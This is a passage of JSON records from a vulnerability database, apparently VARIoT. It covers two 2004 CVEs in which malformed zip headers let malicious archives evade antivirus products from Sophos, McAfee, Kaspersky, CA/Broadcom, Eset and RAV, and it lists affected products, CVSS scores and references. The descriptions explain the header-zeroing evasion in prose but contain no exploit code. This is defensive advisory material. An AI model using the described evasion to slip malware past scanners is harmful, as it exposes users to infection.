"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:antivirus_engine:4.3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.79:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_small_business_suite:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78d:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_puremessage_anti-virus:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.84:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"cve": "CVE-2004-1096",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9526",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-1096",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#492545",
"trust": 0.8,
"value": "3.59"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-061",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9526",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Archive::Zip Perl module before 1.14, when used by antivirus programs such as amavisd-new, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Archive::Zip does not properly parse Zip files and may incorrectly interpret malformed zip archives to contain zero length/size files. As a a result, anti-virus software using Archive::Zip may fail to detect malicious content within a Zip archive. Archive::Zip is a free perl module for working with zip compressed files. Archive::Zip versions prior to 1.14 have security bypass vulnerabilities when used in antivirus programs",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9526",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9526"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#492545",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "13038",
"trust": 1.7
},
{
"db": "BID",
"id": "11448",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2004-1096",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9526",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"id": "VAR-200501-0243",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9526"
}
],
"trust": 0.725
},
"last_update_date": "2023-12-18T12:40:29.045000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Archive::Zip AntiVirus Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146865"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/492545"
},
{
"trust": 1.7,
"url": "http://www.gentoo.org/security/en/glsa/glsa-200410-31.xml"
},
{
"trust": 1.7,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2004:118"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/13038/"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.8,
"url": "http://www.linuxsecurity.com/advisories/gentoo_advisory-5043.html"
},
{
"trust": 0.8,
"url": "http://rt.cpan.org/noauth/bug.html?id=8077"
},
{
"trust": 0.8,
"url": "http://www.idefense.com/application/poi/display?id=153"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-11-12T00:00:00",
"db": "CERT/CC",
"id": "VU#492545"
},
{
"date": "2005-01-10T00:00:00",
"db": "VULHUB",
"id": "VHN-9526"
},
{
"date": "2005-01-10T05:00:00",
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"date": "2005-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-11-15T00:00:00",
"db": "CERT/CC",
"id": "VU#492545"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9526"
},
{
"date": "2021-04-09T17:00:09.303000",
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Archive::Zip may not properly parse the file sizes of Zip archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
],
"trust": 0.6
}
}
VAR-200502-0003
Vulnerability from variot - Updated: 2023-12-18 12:40Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. Many anti-virus vendors have problems when processing .zip files. Remote attackers can use this vulnerability to embed malicious code to bypass the inspection of anti-virus software. The problem lies in the analysis of the header field of the .zip file. The information stored in the compressed file in the .zip file format is divided into two parts, one is the local (local) header field, and the other is the global (global) header field. Local header field data exists before the compressed data file, while global fields exist at the end of the .zip file. Attackers can modify the uncompressed byte size value of the archive file in the local and global header field information without affecting the function, but many antivirus vendors' software cannot handle such archive files well. If the compressed payload contains malicious code, it cannot be detected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200502-0003",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "suse",
"version": "9.2"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_antivirus:7.0_sp2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:inoculateit:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_desktop:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_file_servers:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.82:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
